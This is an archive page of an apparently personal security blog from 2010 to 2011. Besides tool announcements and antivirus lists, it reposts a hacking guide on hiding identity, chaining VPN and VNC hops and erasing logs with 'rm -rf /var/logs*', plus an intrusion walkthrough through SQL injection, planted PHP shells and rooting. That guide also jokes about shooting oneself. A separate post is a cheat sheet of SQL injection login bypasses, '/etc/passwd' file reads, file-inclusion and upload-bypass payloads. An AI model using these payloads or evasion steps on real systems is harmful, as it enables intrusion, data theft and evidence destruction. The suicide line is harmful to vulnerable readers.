Showing posts with label security. Show all posts
Showing posts with label security. Show all posts

Thursday 21 April 2011

Practise, Learn and Master Web Application Hacking With DVWA

DVWA, which stands for Damn Vulnerable Web Application, is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

The DVWA v. 1.07 can be downloaded from HERE.

You will need to install Apache+PHP+MySQL environment(use LAMPP or XAMPP packages) to run and test this web application. This will definitely help you learn to spot web vulnerabilities of the varied levels. I hope this was useful. :)


Saturday 16 April 2011

gufw - A Graphical User Interface To Manage UFW Firewall

Gufw is an easy to use Ubuntu / Linux firewall, powered by ufw.

Gufw is an easy, intuitive, way to manage your Linux firewall. It supports common tasks such as allowing or blocking pre-configured, common p2p, or individual ports port(s), and many others! Gufw is powered by ufw , runs on Ubuntu, and anywhere else Python, GTK, and Ufw are available. Iptables is already a very powerful tool by itself, but it's syntax can get awkward at times and hard to figure out, so Ubuntu developers decided to make ufw ("The reason ufw was developed is that we wanted to create a server-level firewalling utility that was a little bit more for `human beings`"), which was to be simpler. Now, on the graphical side of things, Firestarer already existed. But why not make an even easier to use GUI for desktop `human beings`, powered by ufw? This is where Gufw comes in.

To install Gufw in ubuntu, type the following in your terminal:

sudo apt-get install gufw

You can run Gufw in GNOME menu: /System/Administration/Firewall configuration. To know more about gufw and ufw, you can check the manpage with man gufw and man ufw.


Thursday 14 April 2011

Web Application Attacking and Auditing with W3af Framework.

w3af is a Web Application Attack and Audit Framework. The project's goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend.

W3af is the tool written totally in Python and supports many techniques for detecting and exploiting the web based vulnerabilities.
Framework features

w3af provides plugin writers with this features:
urllib2 wrapper
In order to send requests to the remote server w3af uses urllib2. The xUrllib module of w3af is a wrapper of urllib2 to make the plugin writer life easier, using this wrapper a plugin writer can forget about proxy's, proxy auth, basic/digest auth, etc. This is the complete list of features provided by xUrllib:

- Proxy
- Proxy auth ( basic and digest )
- Site auth ( basic and digest )
- Gracefully handle timeouts
- UserAgent faking
- Add custom headers to requests
- Cookie handling
- Local cache for GET and HEAD requests
- Local dns cache, this will speed up scannings. Only one request is made to the DNS server
- Keep-alive support fot http and https connections
- File upload using multipart POST requests
- SSL certificate support

Output Management
w3af provides plugin writers with an abstraction layer for data output using the Output Manager. The output manager can also be extended using plugins and can be used for writing results to a txt/html file or sending them over the network using scp, the options are endless. Available ouput plugins are:
- Console
- Text file

Web Service support
w3af knows how to parse WSDL files, and audit webservices. Plugin developers can write a simple plugin that will be able to find bugs in web services and also in common HTTP applications.

HTTP headers fuzzing
w3af supports finding bugs in HTTP headers with great ease!

IPC ( inter plugin communication :P) can easily be done using the knowledge base, another w3af feature thats really usefull for plugin developers.

Session saving
Framework parameters can be saved to a file using the sessionManager. After that, you can load the settings and start the same scan again without configuring all parameters.

Right now w3af has a really simple fuzzer, but we have plans to extend it. Fuzzers are great, we know it.

HTML / WML parsing
w3af provides HTML / WML parsing features that are really easy to use.

To install w3af under your ubuntu, type the following in the terminal.

sudo apt-get install w3af

Visit w3af homepage


Friday 25 March 2011

Backtrack 5 Release date announced

Backtrack Linux is the most widely used security pentesting distro and its now near to v. 5. The backtrack team has announced the release date of the BT5.



Saturday 19 February 2011

Art of hacking 2 - spyd3rm4n's guide to hacking

Earlier I posted the spyd3rm4n's guide to hacking part 1 over HERE. This is the 2nd part of the guide. Enjoy the guide.

Part II

[0x01] Common_Knowledge
[0x02] How

Sub Common_Knowledge{
It is customary that a hacker know how to hack, but it is mandatory that a hacker know how to hide his/her ass.

You DO NOT want to get caught because:
A) I'm sure you don't want to pay that hefty fine.
B) I'm positive you don't want a criminal record.
C) You probably don't want to be put on probation.
D) You put everybody you have contacted on the internet within your past at risk of being caught.
E) You WILL be frowned upon as a terrible hacker. Everyone knows, you're dumb as shit if you get caught.
F) If you find any reasons why getting caught would be a good idea, please consider the following:
Go to the local gunshop.
Purchase a powerful weapon (remember, you don't want to screw this up.)
Purchase a small magazine.
Go home, place the clip into the weapon, take off the saftey and look into the barrel of the gun and email me back
the color that flashes inside the barrel when the trigger is pulled.

Sub How{
What are some ways you can hide your ass? Well, good question, but there are many answers.

I have to say, that the most common way for a person to hide their e-dentity is via a proxy.
Now, one problem with the proxies, is that anyone with common sense can find out your real IP. This is the start of Forensics.
The easiest way for a person to find your IP is the find the provider of the proxy, most like CDN (CoDeeN), seeing that they are
the largest proxy releasing company on the inet. Once they contact CoDeeN (who keep records of all IP's logged into their proxy
at all times), they can find your IP and with a simple whois, can come up with the location of you or your ISP. After that, it's just
a long talk between you and your ISP to find out your information. That's if there has been illegal activity and/or you caused some 
pretty hefty damage. ISP's can't release a persons information without a court order as that is an invasion of privacy. But there are
some loop holes in this system. I'm sure you have all read your ISP's fine print and Terms of Service correct? Well, it will most likely
contain something stating that hacking is illegal and that if caught, they can and will report you to the authorities etc.
Another reason is because of the easy PHP function, $_SERVER['HTTP_X_FORWARDED_FOR'] which can be used to grab your real
IP and/or block your attempt at viewing the site.

Another way of hiding your ass, which I suggest as a first part, because it is the easiest, is find a VPN. VPN stands for Virtual Private
Network. Large companies/businesses have these VPN's for their employees to operate on a local network (LAN) over WAN (Wide
Area Network). They will mask your IP with the IP that the VPN is setup on. I.E. My IP is and the VPN IP is,
when I log into the VPN, my IP will become This covers your IP over every protocol, it whoops Socks 4 and Socks 5 proxies
rearends. The one thing you have to worry about with a VPN, is that they too, if setup correctly, can log every IP that has used the VPN
at anytime of the day.

Now that the 2 most common ways of hiding your ip have been discussed. Let's not rule out some of the other ways. One being VNC tunneling.
This is the process of logging in to a remote administrative tool repeatedly on other servers.
Server 1 IP:
Server 2 IP:
Server 3 IP:

All servers have VNC running. I will then log into the VNC for Server 1, then I will use Server 1's VNC to log into Server 2, and repeat the process until
I am logged in on Server 3. This will hide my IP 3 times and make tracing it back even harder. But, once again, you've guessed it. It records everything.

Well, Since I'm getting pretty desperate here, why don't I go balls out?

I will hop on a VPN, then I will VNC tunnel into about 2 or 3 Servers, while logging into a VPN on each of those, then, finally, when I'm tunneled into
Server 3, I will put a VPN on, log into a Socks 4 proxy, put on a anonymous proxy, if I have to, even goto a well known web proxifying site that runs
a CGI or PHP built proxy to view the content needed. Now, picture yourself as that person who has to find your real IP. Yeah, it's gonna be a blast.
The only bad part about this is the fact that the more you log into, the slower and slower it will get. Best done on a high-speed line.

Finally, since this is a mini-book on hiding your ass, I might as well tell you that everything of anything on the internet is logged. Don't forget to clear them.
Example: SSH-
don't forget to rm -rf /var/logs*

- Credits : Kr3w of TheDefaced.


Friday 18 February 2011

Art of hacking 1 - spyd3rm4n's guide to hacking

This series of articles can be very useful for many beginners out there but after the thedefaced and darkmindz went down, I haven't really seen these articles anywhere else. So I thought to share this article over here. Its NOT written by me and I would like to provide the full credit to the original author as well.

Art of hacking [ 1 ] 

spyd3rm4n's guide to hacking

Part I

[0x01] Definition
[0x02] Method
[0x03] Side_Notes
[0x04] Credits

Sub Definition{
a : to write computer programs for enjoyment
b : to gain access to a computer illegally

Sub Method{
These are the boundaries that differentiate a hacker, from a cracker. A cracker will use the same methods of a hacker, but instead of leaving it at just that, they will take it one step beyond, and use the information gained to extort another person and/or cause damage.

Now that has been cleared up, I will just inform you of one of my most common method of hacking.

When I hack, it is a golden rule that I must know what I am hacking. If it's a website, I must know what language is it written in. If I do not, I will learn the language, or at least be able to read it and pick out human errors in the programming.

I usually start like this:
I will first search the website for vulnerable user-input fields. Something that interacts with the viewer. It should include fields that are POST and GET. I will test these fields for penetration. The most common fields vulnerable, are search forms. These can be vulnerable to almost any type of injection, HTML, JAVASCRIPT, or SQL. To test if a field is injectable with HTML, I will usually type "<h1>hello</h1>." If the page returns the word hello in big bold letters, I know it's vulnerable. I then will step it up to JAVASCRIPT. I will type "<script>alert(1)</script>", <script language="Javascript">alert(1)</script>m etc.." If the returned page contains an alert message printing the number 1, I know I can cross-site script it (XSS). SQL on the other hand has a number of pen-testing syntaxes. I usually type a single quote, if it returns SQL errors, I know its vulnerable to injection. If it doesn't, I will sometimes try different combinations of SQL attacks. I will try most commonly, and my favorite, a union injection. Syntax: '+union+select+1-- 
If that returns with any sort of SQL error, I then know I hit the jackpot. The most common error with union selections is "The UNION SELECT statement is missing the correct number of columns" or something of that sort. It means that you have to select more than one column. This can be the longest part of injecting. You then have to '+union+select+1,2-- each time, adding on another number separated by a comma until your UNION SELECT statement has no errors, and returns a value from that field. I will then look for the returned page for a number. If for example, lets say I did '+union+select+1,2,3,4,5,6--
and the page returns a series of pictures, and in the blue, there is just the number 6 on that page, I will then do '+union+select+1,2,3,4,5,table_name+from+information_schema.tables--
This will select the table name from the information schema, if its allowed. That's all I'm going to say about that for now. If you want to know more, you can learn up on your SQL.

Next, if I find the site is pretty secure, it is always important not to rule out other methods of intrusion. My 2nd and favorite method, is the capturing of the host. With a simple WHOIS lookup, I can find the host of their site. Now, if I pen-test their host and find a vulnerability, that is just as good as hacking their site because it allows for a way in. If all else fails, you can do a reverse IP lookup on the domain of the website. Take a look at all the other websites on that IP and pen-test their security. If you can get rights to upload on one of their sites, you can upload a PHP-Shell and work your way into their directory, viewing their files. If you want to take it further, you can go ahead and try to root the server. Rooting is pretty easy if you know what you're looking for/know any stack/buffer overflows for the OS. Most servers run linux, so it's best to look for overflows for that specific kernel version that contain "Local Root" in it. Other than that, there are so many ways of obtaining root. These include but are not limited to key-logging, phishing, and social engineering. That's pretty much the basis of one of my most common methods of hacking. If you would like to know more, well.. I'm sorry, but you're going to have to pick up the knowledge as you continue your career hacking.

Sub Side_Notes{
If you want to learn more, you can check out the mini-books on Hide My Ass, XSS Injection, SQL Injection, Navigating towards root in a PHP Shell, and Stack Overflows in a nuttshell.

Sub Credits{
I'm sure you're all wondering who I am going to credit in this. The thing is that over the years, I have encountered many talented hackers. Too many to name in fact. But, there is one person I have to give credit to for being probably one of the most talented hackers I have "read" from. This person is unknown, and I'm sure many of you have read some of their docs. This person is the author of the ZFO (Zero For Owned) series. If you haven't read them, I highly suggest you do a google dork for Zeroforowned. Not to sure on how many of them are still public/around. (You'll notice the style of documentation similarity that I have put in this document, with the ZFO).

- Credits : Kr3w of TheDefaced 


Thursday 10 February 2011

Paros Proxy - A tool for security pentester

Paros proxy can be used as the security pentest tool for evaluating the security of the web application. Written in JAVA, this tool can be used to intercept and modify all HTTP and HTTPS data between server and client, including cookies and form fields. Moreover this tool comes with an inbuilt session ID analyzer and fuzzing tool too.

For more information and downloads, you can visit the Official Site.

Thanks. :)


Friday 7 January 2011

List of online MD5 [+ other] hash crackers

Here is the list of some of the online MD5 hash cracking services you might find useful. Some of them offer cracking of other hashes like SHA1, LM, MySQL, etc., My personal favorite, Another service I try, performs lookup in different online hash crackers

There are more other online md5 crackers but these would be enough to crack the hashes, if not they are unlikely any other online crackers would crack them (except the dedicated and paid ones). I hope this helps you.

EDIT: Few more online crackers added:


Sunday 26 December 2010

Bypass web filters of Nepali ISPs

Well okay, I am here to rescue you if you are facing the problem of finding the website you want to visit getting blocked by the ISPs. After NTA sent the letters to the ISPs in Nepal to block the sites with some potentially bad contents, ISPs have started doing filtering and blocking of the websites. In this post, I am going to show you how to bypass the web filters being applied by the ISPs. I've tested with the websurfer ISP but still you might find one of these ways working for you.

Method #1:
So I assume you are searching for some stuffs in the torrent and lets say your search query goes to the URL.
For example, I search for sex comedy movie in, the search query would result in a URL like:

Unfortunately websurfer blocks the keywork sex from the URL query so we get the page like below:

Now lets change our query by searching with the caps version of sex i.e. SEX to bypass such filtering. The new URL after entering search keywords would be:

And this time you get the valid webpage with your expected search results. Wasn't that easy bypassing this lame blocking?
Method #2:
I was checking the lists of the websites which were being blocked by Nepali ISPs and my eyes caught and I tried opening it. But it was another site to be blocked.
Check the screenshot below:

This time I am using the internet protocol address (IP Address of the website) to visit the website. In order to find the IP of any website, you can simply do:


This will give you the IP of the website. For, the associated IP was so now on your browser, type the address of the website as and that would bypass and open the website.

Method #3:
Using proxy
While this tends to be slow for me, you can use the freely available proxies to bypass the web filters. I will leave this technique to do on your own as there are hundreds of tutorials on how to use proxies. Anyway, I leave you with the site called which consists of tons of proxies to be used.

Also, you might try installing the TOR software in your system(works pretty well for me).

Method #4:
Another way is to use the alternative DNS servers which will work perfectly if the ISP is blocking the websites based on DNS resolutions. You can use the DNS servers from OpenDNS or Google or you may google for other free DNS servers. Be sure to choose the good DNS server while doing so. The good thing about OpenDNS is that it also provides anti-phishing protection that your ISP might not be providing.

Google's DNS IPs: and
OpenDNS IPs: and

You can then set up the DNS servers either in router or your PC as required.

Method #5 and more:
I will update this post when I test things more and more. I haven't tested with VPNs, google cache, translators, etc. These days, ISPs are also blocking the websites by combining the above discussed methods further aided by the deep packet inspection.

I hope this helps some of you out there. Thanks.


Web Hacking for Beginners and Intermediates

This is the article I posted on the secworm contest and I am now posting this in my blog. Its not that well written due to the lack of time but still will help some of you out there.

Hi all, I am Deadly Ghos7 aka sam207 and this is my article as the entry for the secworm contest #1. First, I would like to apologize for any kind of grammar mistakes in this article as there would be surely lots of grammatical errors in this article.

This article is not an article about teaching the basics of any web hacking techniques. Instead, it is the document of tips and tricks that the beginners and intermediates can make use of in order to attack the web applications on certain scenarios. I assume that you know the basics of the web hacking techniques or you could google for learning the basics. I'll be covering the tricks on different web hacking methods such as SQL injection(MySQL basically), insecure file inclusions, insecure file upload, etc. As already stated, the article won't be about basic but rather would present you few useful tricks that might be useful in the course of web-app pentesting.

SQL Injection:
Comments: - - , /* , #
MySQL version: SELECT @@version

Current SQL User: SELECT user()
SELECT system_user()

Current Database: SELECT database()

MySQL Data directory(location of MySQL data files): SELECT @@datadir

List all MySQL users: SELECT host, user, password FROM mysql.user

Bypass Quotes: SELECT pass FROM users WHERE user=0x2773616d32303727 --hex
SELECT pass FROM users WHERE user=char

Load local file: SELECT LOAD_FILE('/etc/passwd') --We can use quote bypassing here.

Create File with SQLi: SELECT * FROM table INTO dumpfile '/tmp/dump'
SELECT password FROM user INTO OUTFILE '/home/samar/www/dump.txt'
quote bypassing seems not working here. The path can't be encoded using the quote or char so we can't bypass the quote in this case.

Using limit: union all select null,table_name,null from information_schema.tables LIMIT 20,1
(useful when only one column is seen while doing SQLi)

unhex(hex()): union all select 1,concat(unhex(hex(username,0x3a,password))) from tblusers--

Bypassing filters:
uNiOn aLl SeLeCT 1,2 FrOm tbluser
/*!union*/ all select 1,2 from tbluser
union(select(null),table_name(from)(information_schema.tables)) --Bypassing the whitespace filter

XSS with SQLi (SIXSS): union all select 1,<script>alert(123)</script>

Login bypass:
'=' in both username and password field
' or 1='1'--
' or 1='1'/*
' or 1='1'#
' or 1='1';
In the username field and random password, it would bypass the vulnerable authentication login.

' /*or*/ 1='1 –Bypasses or filter

File Inclusion:
-> A sample vulnerable piece of code would be something like below: test.php

including file in the same directory

path traversal to include files in other directories

Nullbyte injection

Directory listing with nullbyte injection only for FreeBSD (afaik) and magic quotes off

PHP stream/wrappers inclusion

Path Truncation inclusion
test.php?page=../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
With more details on this,
Apache Log injection
You'll have to find the location of the log in order to include it. Also you should try including everything you can such as the session files, uploaded files, etc. For the apache log injection, you'll have to telnet and send the GET request for arbitrary PHP code like Get / Few apache log locations to try are as below:

Set your useragent to some php code and it will get executed if you are able to include the /proc/self/environ file.

Check existence of folder:
Here the trick is basically using the path traversal method.

File upload:
Nullbyte injection: If only valid extensions(such as jpg, gif) are allowed, we can rename our shell to shell.php.jpg which will bypass the file upload security check.

PHP code within image: Sometimes the uploads are not checked for the file extension but for dimensions of images. This again can be bypassed by injecting PHP codes in the valid images and renaming them to .php file. The tool named edjpgcom can be used in order to inject the PHP code as JPEG comments in the images.

Header bypass: Again sometimes the developer just relies on the header information that contains the type of the file like “image/jpeg” for jpeg image. But since this is passed from client side, it can be modified using the tools such as tamper data or live http headers.

Also, the file upload feature can be exploited in union with the file inclusion vulnerability. If you have a site vulnerable to the file inclusion but not vulnerable to the insecure file upload, you can upload valid image as said in second method here and then you can include that file with the file inclusion vulnerable PHP script.

As said earlier, this article is not about giving you every steps of how to exploit the web vulnerabilities.


Thursday 23 December 2010 the Evil URL Shortener

Many of you might have heard about LOIC which has been used by kids to DDoS attack the sites. Now, the creative hacker Ben Schmidt (supernothing) of has implemented the JS LOIC in order to use it for the DoS attacks.

Whenever the users visit the shortened URLs from, the website being visited will be constantly sent the HTTP requests everytime, thus creating the DoS condition. So this can be utilized to create the botnet for the DDoS attack. Why not read the post from Ben Schmidt himself? The Evil URL Shortener website


Saturday 11 December 2010

Safe URL shortening with

Recently, there have been lots of misuse of the popular URL shortening services in order to infect the users with the malwares. I've been hating these URL shortening services but now has arrived as a safe alternative for these URL shortening services. service checks the link for the malicious content using the Bitdefender antivirus. When using for URL shortening you get the added benefit of antivirus and antiphishing scans, which allow you and your friends to safely share content over the Internet. A check on your URL means that all those who are going to use it are safe from malware and from personal data theft attempts.


Avoiding the Man In The Middle through ARP Spoofing/Poisoning

ArpON (Arp handler inspectiON) is a portable handler daemon that make ARP secure in order to avoid the Man In The Middle through ARP Spoofing/Poisoning. It detects and blocks also Man In The Middle through ARP Spoofing/Poisoning for DHCP Spoofing, DNS Spoofing, WEB Spoofing, Session Hijacking and SSL/TLS Hijacking & co attacks.

This is possible using two kinds of anti ARP Poisoning tecniques: the first is based on SARPI or "Static Arp Inspection" the second on DARPI or "Dynamic Arp Inspection" approach. SARPI and DARPI protects both unidirectional, bidirectional and distributed attacks.

Into "Unidirectional protection" is required that ArpON is installed and running on one node of the connection attacked. Into "Bidirectional protection" is required that ArpON is installed and running on two nodes of the connection attacked. Into "Distributed protection" is required that ArpON is installed and running on all nodes of the connections attacked. All other nodes whitout ArpON will not be protected from attack.

ArpON is therefore a host-based solution that doesn't modify ARP's standard base protocol, but rather sets precise policies by using SARPI for static networks and DARPI for dynamic networks (DHCP) thus making today's standardized protocol working and secure from any foreign intrusion.

Third party solutions exist, but all of them have some weaknesses, weaknesses which aren't present in ArpON.
Some examples:

1) Arpwatch: detects foreign intrusions but doesn't block them;
2) S-Arp (Secure ARP) slows down the protocol by injecting additional headers, encrypting communication and thus requiring more computational power;
3) DAI (Dynamic ARP inspection) from Cisco, ProCurve, Extreme Networks, Dlink and Allied Telesis slows down the protocol by making multiple DHCP server interrogations (DHCP Snooping) thus requiring more computational power;
4) IEEE 802.1AE, slows down the protocol by making massive use of encryption thus requiring more computational power.

Keep in mind other common tools fighting ARP poisoning usually limit their activity only to point out the problem instead of blocking it, ArpON does it using SARPI and DARPI policies. Finally you can use ArpON to pentest some switched/hubbed LAN with/without DHCP protocol, in fact you can disable the daemon in order to use the tools to poison the ARP cache.

- It detects and blocks Man In The Middle through ARP Spoofing/Poisoning attacks in statically configured networks;
- It detects and blocks Man In The Middle through ARP Spoofing/Poisoning attacks in dinamically configured (DHCP) networks;
- It detects and blocks Man In The Middle through ARP Spoofing/Poisoning for DHCP Spoofing attack;
- It detects and blocks Man In The Middle through ARP Spoofing/Poisoning for DNS Spoofing attack;
- It detects and blocks Man In The Middle through ARP Spoofing/Poisoning for WEB Spoofing attack;
- It detects and blocks Man In The Middle through ARP Spoofing/Poisoning for Session Hijacking attack;
- It detects and blocks Man In The Middle through ARP Spoofing/Poisoning for SSL/TLS Hijacking attack;
- It detects and blocks unidirectional, bidirectional and distributed attacks;
- Doesn't affect the communication efficiency of Arp protocol;
- Multithreading on all OS supported (Pthread lib);
- It manages the network interface into unplug, boot, hibernation and suspension OS features;
- It works in userspace for OS portability reasons;
- Easily configurable via command line switches, provided that you have root permissions;
- It replaces Arpwatch, DAI (Dynamic ARP Inspection), S-ARP (Secure-ARP), IEEE 802.1AE & co;
- Tested against Ettercap, Cain & Abel, dsniff and other tools.

Download ArpON


Friday 10 December 2010

RIPS - PHP Static Source Code Analyzer

RIPS is a static source code analyser for vulnerabilities in PHP webapplications. It was released during the Month of PHP Security (

In this submission a tool named RIPS is introduced which automates the process of identifying potential security flaws in PHP source code by using static source code analysis. RIPS is open source and freely available at The result of the analysis can easily be reviewed by the penetration tester in its context without reviewing the whole source code again. Given the limitations of static source code analysis, a vulnerability needs to be confirmed by the code reviewer.


Saturday 4 December 2010

Antivirus Softwares for Linux

The myth of Linux being insecure is not true but it is said so due to the fact that it is not that widely used and not much used in the enterprises and homes but still they are not full proof so some antivirus protection for you Linux system might be obtained with any of the following softwares.

1) ClamAV: Clam AntiVirus is an open source (GPL) anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways. It provides a number of utilities including a flexible and scalable multi-threaded daemon, a command line scanner and advanced tool for automatic database updates. The core of the package is an anti-virus engine available in a form of shared library.
ClamAV Home

2) Bitdefender AV Scanner: BitDefender Antivirus Scanner for Unices is a versatile on-demand scanner for Linux and FreeBSD systems. The stand-alone scanner protects both UNIX-based and Windows-based disk partitions by scanning for viruses and spyware. Easy to use graphical user interface complements a powerful command line interface that fully supports operating system’s scripting tools.
Bitdefender AV Scanner for Unices

3) AVG: Basic antivirus protection for Linux/FreeBSD available to download for free. Free virus protection for your PC. For private and non-commercial use only.

4) avast! Linux Home Edition: avast! Linux Home Edition represents an antivirus solution for the increasingly popular Linux platform. The Home Edition is offered free of charge but only for home, non-commercial use.
Avast! Linux Home Edition

5) F-Prot AV: F-PROT Antivirus for Linux was especially developed to effectively eradicate viruses threatening workstations running Linux. It provides full protection against macro viruses and other forms of malicious software - including Trojans.
F-Prot AV

Any other additions, feel free to comment here.


Monday 22 November 2010

Some hacking and security distribution to try

So you want to learn the art of hacking or you want to be in the professional pen-testing? or whatever related to information security. You can try some of the security and hacking distributions which I've listed as below:

Backtrack: It is the highest rated and acclaimed Linux security distribution to date. BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. Regardless if you’re making BackTrack your primary operating system, booting from a LiveDVD, or using your favorite thumbdrive, BackTrack has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester. So don't miss this one.

NodeZero: It is Ubuntu based linux designed as a complete system which can also be used for penetration testing. NodeZero uses Ubuntu repositories so your system will be always up to date. The system setup is basic and it's primarly designed for disk installation and customization as you want. With NodeZero comes around 300 tools for penetration testing and set of basic services which are needed in penetration testing. Also they are preparing a repository of pentest tools so your system will be up to date at all time.

DEFT Linux: DEFT Linux v6 is based on the new Kernel 2.6.35 (Linux side) and the DEFT Extra 2.1 (Computer Forensic GUI) with the best freeware Windows Computer Forensic tools. DEFT it’s a new concept of Computer Forensic live system that use LXDE as desktop environment and thunar file manager and mount manager as tool for device management. It is a very easy to use system that includes an excellent hardware detection and the best free and open source applications dedicated to incident response and computer forensics.

Katana: Katana is a portable multi-boot security suite which brings together many of today's best security distributions and portable applications to run off a single Flash Drive. It includes distributions which focus on Pen-Testing, Auditing, Forensics, System Recovery, Network Analysis, and Malware Removal. Katana also comes with over 100 portable Windows applications; such as Wireshark, Metasploit, NMAP, Cain & Abel, and many more.
Site: Katana Home

I'll update this post when I get to know more distros.


Thursday 7 October 2010

Toddler Keys- Protect your computer from children

Toddler Keys is a program that protect your computer from children by accident pressing wrong buttons or keys or mouse clicks.

It is a useful tool for parents that allows you to lock your computer keyboard, CD drive doors and power-off button. When the keyboard is used it will display images and play sounds every time a key is pressed, thereby preventing access to the desktop and applications, while adding some entertainment value for the kid.

To exit the locked screen, just type the word QUIT.

Download Toddler Keys

Go to Toddler Keys Home


Sunday 3 October 2010

Online Virus Scanners [Multi Scanners]

If you get suspicious with any file in your PC and want to scan it with multiple antivirus engines, you don't have to go on downloading and installing all the antivirus tools but you can use online alternatives for this purpose.

There are few online service that enables you to scan suspicious files with several anti-virus programs. Some of them are:

a) This one is what I use and I use it for testint the trojan and malware codes after my hex editings. Go to Novirusthanks Multi-Engine Scanner

b) Another multi-scanning online service. Go to VirusTotal Multi-Engine Scanner

c) Jotti's malware scan: Never tried this myself... Go to Jotti's Multi-Engine Scanner

I hope you find this post useful... :)


Tuesday 28 September 2010

Full path disclosure tutorial

Full path disclosure(FPD) is the revelation of the full operating path of a vulnerable script. Full Path Disclosure vulnerabilities enable the attacker to see the path to the webroot/file. e.g.: /home/samar/public_html/. FPD bugs are executed by providing unexpected characters to the vulnerable functions that will in return output the full path of the vulnerable script.

FPD bugs are often overlooked and are not considered as the security threat by many webmasters but that's not true. FPD might be useful for the hackers to determine the structure of the server and they can utilize it to perform other attacks such as file inclusion attacks or load_file() attacks via sql injection.

How to execute FPD
a) Nulled session cookie
Nulled session injection or illegal session injection is done by changing the value of session cookie to an invalid or illegal character.
Illegal Session Injection is made possible via changing the value of the session cookie to an invalid, or illegal character. The most common method is by injecting the NULL character to the PHPSESSID cookie. To inject a PHPSESSID cookie, use JavaScript injection via the URL bar:

On setting the PHPSESSID cookie value to NULL, we can see the result like:

Warning: session_start() [function.session-start]: The session id contains illegal characters,
valid characters are a-z, A-Z, 0-9 and '-,' in /home/samar/public_html/includes/functions.php on line 3

b) Array parameter injection(Empty array)
This is another common method of executing the full path disclosure vulnerabilities and usually works for me in many sites. There are different PHP functions which will output warning message along with the full path of the script such as htmlentities(), mysql_num_rows(), opendir(), etc.
We can exploit the $_GET variables... Lets take a simple example:


Now, lets exploit the $_GET['page'] variable which will look as below:


The full path disclosure can be prevented by turning off the display of errors either in php.ini configuration file or in the script itself:

display_errors = 'off'

in php scripts


ini_set('display_errors', false);


Wednesday 22 September 2010

EmailTrackerPro - Email tracking software for tracking the sender

eMailTrackerPro is the tool that can help you track down the email senders by analyzing the email headers. This tool is a product from the VisualWare Inc. which works in network assessment and connection analysis solutions.

eMailTrackerPro asks for the email header and all the tasks is done by this tool. eMailTrackerPro analyzes the email header to find the route or path of the email. And hence it helps to track down the email sender's IP address which can be very useful for dealing with spam emails.

In order to find the email header, you'll have to open the email in your inbox and there should be some location from where you can view the email header. For instance, Yahoo mail has the option called view full header in Actions tab when you're viewing the email(See the screenshot below).

Now, all you've to do is copy these email headers and let the eMailTrackerPro analyze the headers and provide you the IP address of the originating location.

The software will generate the report in HTML format too.

Go to eMailTrackerPro home

Have fun... :)